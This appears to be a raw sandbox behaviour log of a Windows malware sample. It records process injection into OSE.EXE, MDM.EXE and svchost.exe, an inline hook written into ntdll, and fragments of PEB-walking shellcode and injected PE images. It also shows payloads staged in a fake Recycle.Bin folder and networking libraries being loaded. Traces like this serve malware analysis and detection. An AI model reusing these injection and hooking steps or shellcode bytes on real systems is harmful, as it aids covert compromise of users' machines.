File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 22 01 00 00 1C 00 00 00 00 00 00 73 12 00 00 00 10 00 00 00 20 01 00 00 00 AB 71 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 70 01 00 00 04 00 00 20 F0 01 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 14 00 00 success or wait 2048595307
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2048595874
Memory allocated PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2048596330
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 53 21 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 14 09 00 00 00 40 01 00 00 0A 00 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 F8 03 00 00 00 50 01 00 00 04 00 00 success or wait 2048596430
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2048596651
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2048596821
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 20480 Protection: readonly Mapped to pid: own pid success or wait 2048597090
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2048597789
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2048598038
Memory written PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2049051522
Memory written PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2049074297
Memory allocated PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 650000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2049075091
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2049076666
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2049077286
File opened Path: C:\WINDOWS\system32\ADVAPI32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2049077376
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2049077942
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2049078376
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2049078513
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2049078689
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2049078851
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 20 Value: 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2049079197
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2049079822
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 46 07 00 00 3E 02 00 00 00 00 00 0B 71 00 00 00 10 00 00 00 20 07 00 00 00 DD 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 B0 09 00 00 04 00 00 B8 5B 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 A4 16 00 00 success or wait 2049079925
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2049080322
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 C9 45 07 00 00 10 00 00 00 46 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 28 46 00 00 00 60 07 00 00 2C 00 00 00 4A 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 80 A9 01 00 00 B0 07 00 00 AA 01 00 success or wait 2049080588
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2049080828
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2049081301
Section loaded Path: C:\WINDOWS\system32\advapi32.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 28672 Protection: readonly Mapped to pid: own pid success or wait 2049081548
Memory written PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 650000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2049107123
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2049107742
Memory written PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 7C90CFEE Length: 5 Value: E9 BF 33 D4 83 success or wait 2049128706
Memory allocated PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2049130378
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2049131005
File opened Path: C:\WINDOWS\system32\CRYPT32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2049131131
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2049131339
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2049131568
Memory written PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2049928956
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\crypt32.dll success or wait 2049929881
Thread delayed Time: 0 TID: 4214 success or wait 2049929927
Thread delayed Time: 0 TID: 4214 success or wait 2049930030
Thread delayed Time: 0 TID: 4214 success or wait 2049930993
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2049931384
Thread delayed Time: 0 TID: 4214 success or wait 2049931594
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\crypt32.dll success or wait 2049932305
Memory written PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2049955286
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 20 Value: 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2049955351
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 44 08 00 00 DC 00 00 00 00 00 00 32 16 00 00 00 10 00 00 00 20 08 00 00 00 A8 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 50 09 00 00 04 00 00 30 C5 09 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 9C 1A 00 00 success or wait 2049955577
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\crypt32.dll success or wait 2049955955
Memory allocated PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 8F0000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2049956149
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 C4 43 08 00 00 10 00 00 00 44 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 E8 23 00 00 00 60 08 00 00 24 00 00 00 48 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 50 67 00 00 00 90 08 00 00 68 00 00 success or wait 2049956310
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\crypt32.dll success or wait 2049956601
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and read Type: commit Baseaddress: 2950000 Size: 77824 Protection: readonly Mapped to pid: own pid success or wait 2049956857
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2049957124
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2049957888
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2049959053
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2049959577
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2049960369
Mutant created Name: \BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 2049960831
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1F70000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2049962008
Thread created PID: 1636 TID: 924 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2049962655
Memory written PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 8F0000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2049994890
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2050001319
Memory written PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 7C90CFEE Length: 5 Value: E9 BF 33 FE 83 success or wait 2050023580
Memory allocated PID: 2264 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2050025238
Memory attributes changed PID: 2264 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2050025374
Memory attributes changed PID: 2264 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2050025519
Memory attributes changed PID: 2264 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2050026536
Memory written PID: 2264 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2051526728
Thread delayed Time: 0 TID: 4214 success or wait 2051535280
Thread delayed Time: 0 TID: 4214 success or wait 2051535763
Thread delayed Time: 0 TID: 4214 success or wait 2051538744
Thread delayed Time: 0 TID: 4214 success or wait 2051540013
Memory written PID: 2264 Path: C:\WINDOWS\system32\svchost.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2051583768
Memory allocated PID: 2264 Path: C:\WINDOWS\system32\svchost.exe Base: 9A0000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2051586301
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2051587213
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2051591753
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2051592339
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2051592615
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2051595349
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1F70000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2051596126
Memory written PID: 2264 Path: C:\WINDOWS\system32\svchost.exe Base: 9A0000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2051644504
Memory attributes changed PID: 2264 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2051647226
Memory written PID: 2264 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 09 84 success or wait 2051705888
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2051713318
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2051714256
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F70000 Length: 216FA60 Allocation Type: null Protection: page execute and read and write success or wait 2051725641
Thread created PID: 1636 TID: 2196 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2051730554
Thread created PID: 1636 TID: 2188 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2051735329
Thread created PID: 1636 TID: 2192 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2051738031
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: normal Content Overwritten: false success or wait 2051756116
File other operation Disposition: PositionInformation Data : Offset: 5930 Path: C:\Recycle.Bin\07A49F015E0D693 success or wait 2051760722
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 4 Value: 03 12 C0 79 success or wait 2051760945
File opened Path: C:\Recycle.Bin\B6232F3AC2C.exe Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2051761615
File read Path: C:\Recycle.Bin\B6232F3AC2C.exe Offset: none Length: 254976 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 2051764189
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2052191213
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2052192331
Section loaded Path: C:\WINDOWS\system32\mswsock.dll Access: write and read and execute Type: commit Baseaddress: 2950000 Size: 245760 Protection: execute Mapped to pid: own pid success or wait 2052224097
Section loaded Path: C:\WINDOWS\system32\mswsock.dll Access: query and write and read and execute Type: image Baseaddress: 71A50000 Size: 258048 Protection: read write Mapped to pid: own pid success or wait 2052228982
Section loaded Path: \KnownDlls\DNSAPI.dll Access: write and read and execute Type: unknown Baseaddress: 71A50000 Size: 258048 Protection: read write Mapped to pid: own pid object name not found 2052253823
Section loaded Path: C:\WINDOWS\system32\dnsapi.dll Access: query and write and read and execute Type: image Baseaddress: 76F20000 Size: 159744 Protection: read write Mapped to pid: own pid success or wait 2052255717
Section loaded Path: C:\WINDOWS\system32\winrnr.dll Access: write and read and execute Type: commit Baseaddress: 1F80000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 2052368242
Section loaded Path: C:\WINDOWS\system32\winrnr.dll Access: query and write and read and execute Type: image Baseaddress: 76FB0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2052371398
Section loaded Path: \KnownDlls\rasadhlp.dll Access: write and read and execute Type: unknown Baseaddress: 76FB0000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2052388703
Section loaded Path: C:\WINDOWS\system32\rasadhlp.dll Access: query and write and read and execute Type: image Baseaddress: 76FC0000 Size: 24576 Protection: read write Mapped to pid: own pid success or wait 2052390200
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2052448067
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2052448854
Section loaded Path: \KnownDlls\RASAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid object name not found 2052469085
Section loaded Path: C:\WINDOWS\system32\rasapi32.dll Access: query and write and read and execute Type: image Baseaddress: 76EE0000 Size: 245760 Protection: read write Mapped to pid: own pid success or wait 2052471065
Section loaded Path: \KnownDlls\rasman.dll Access: write and read and execute Type: unknown Baseaddress: 76EE0000 Size: 245760 Protection: read write Mapped to pid: own pid object name not found 2052485637
Section loaded Path: C:\WINDOWS\system32\rasman.dll Access: query and write and read and execute Type: image Baseaddress: 76E90000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2052490021
Section loaded Path: \KnownDlls\TAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 76E90000 Size: 73728 Protection: read write Mapped to pid: own pid object name not found 2052508116
Section loaded Path: C:\WINDOWS\system32\tapi32.dll Access: query and write and read and execute Type: image Baseaddress: 76EB0000 Size: 192512 Protection: read write Mapped to pid: own pid success or wait 2052510129
Section loaded Path: C:\WINDOWS\system32\tapi32.dll Access: read Type: commit Baseaddress: 2950000 Size: 184320 Protection: readonly Mapped to pid: own pid success or wait 2052555137
Thread delayed Time: 0 TID: 4214 success or wait 2052645825
Thread delayed Time: 0 TID: 4214 success or wait 2052646348
Thread delayed Time: 0 TID: 4214 success or wait 2052648767
Thread delayed Time: 0 TID: 4214 success or wait 2052650601
Section loaded Path: \KnownDlls\sensapi.dll Access: write and read and execute Type: unknown Baseaddress: 2950000 Size: 184320 Protection: readonly Mapped to pid: own pid object name not found 2052870621
